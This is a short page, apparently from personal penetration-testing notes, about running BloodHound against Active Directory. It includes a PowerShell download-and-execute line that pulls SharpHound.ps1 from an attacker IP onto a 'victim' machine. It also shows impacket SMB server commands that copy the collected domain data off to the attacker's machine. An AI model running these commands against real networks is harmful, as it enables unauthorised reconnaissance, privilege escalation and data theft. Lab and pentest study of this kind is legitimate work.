Bloodhound

GitHub - SpecterOps/BloodHound-Legacy: Six Degrees of Domain AdminGitHub

The following tool aclpwn.py by foxit identifies and exploits ACL based privilege escalation paths

GitHub - fox-it/aclpwn.py: Active Directory ACL exploitation with BloodHoundGitHub

Copy SharpHound to the Victim

The first thing to do is copy the ShapHound.ps1 script to the victim

iex(new-object net.webclient).downloadstring('http://10.10.14.4/SharpHound.ps1')

Run the Collector

invoke-bloodhound -collectionmethod all

Get the Collected Files from the Victim

I like to use the impacket smbserver.py script

# On my Kali Box
smbserver.py -smb2support share /tmp/smb -username wasabi -password wasabi123 

# On the victim
net use \\10.10.11.12\share /u:wasabi wasabi123

# Now we can copy the files from the victim to our Kali box
copy XXXXXXX_Bloodhound.zip \\10.10.11.12\share\

PreviousKerberos NextDNS Admin to SYSTEM

Last updated 5 years ago

hashtagCopy SharpHound to the Victim

hashtagRun the Collector

hashtagGet the Collected Files from the Victim

Copy SharpHound to the Victim

Run the Collector

Get the Collected Files from the Victim